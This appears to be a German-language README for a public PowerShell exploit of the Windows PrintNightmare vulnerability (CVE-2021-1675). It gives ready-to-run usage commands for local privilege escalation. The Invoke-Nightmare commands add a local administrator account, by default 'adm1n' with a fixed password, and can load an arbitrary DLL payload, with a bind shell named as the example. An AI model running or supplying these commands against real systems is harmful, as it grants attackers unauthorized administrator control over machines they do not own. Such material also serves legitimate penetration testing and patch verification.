
# PowerShell-Skript zur lokalen Privilegienerweiterung unter Windows über die PrintNightmare-Schwachstelle (CVE-2021-1675), das einen lokalen Administrator-Benutzer hinzufügt oder benutzerdefinierte DLL-Payloads ausführt.
Caleb Stewart | John Hammond | 1. Juli 2021
CVE-2021-1675 ist eine kritische Schwachstelle für Remote-Codeausführung und lokale Rechteausweitung, die den Namen „PrintNightmare“ trägt.
Proof-of-Concept-Exploits wurden für die Remote-Codeausführung veröffentlicht (Python, C++) sowie eine C#-Variante für die lokale Rechteausweitung. Wir hatten keine native Implementierung in reinem PowerShell gesehen und wollten uns daran versuchen, den Exploit zu verfeinern und neu zu gestalten.
Dieses PowerShell-Skript führt eine lokale Rechteausweitung (LPE) mit der PrintNightmare-Angriffstechnik durch.

Dies wurde auf Windows Server 2016 und Windows Server 2019 getestet.
Fügt standardmäßig einen neuen Benutzer zur lokalen Administratorengruppe hinzu:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # fügt standardmäßig den Benutzer `adm1n`/`P@ssw0rd` zur lokalen Administratorengruppe hinzu
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
Stellen Sie eine benutzerdefinierte DLL-Payload bereit, um alles andere zu tun, was Sie möchten.
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"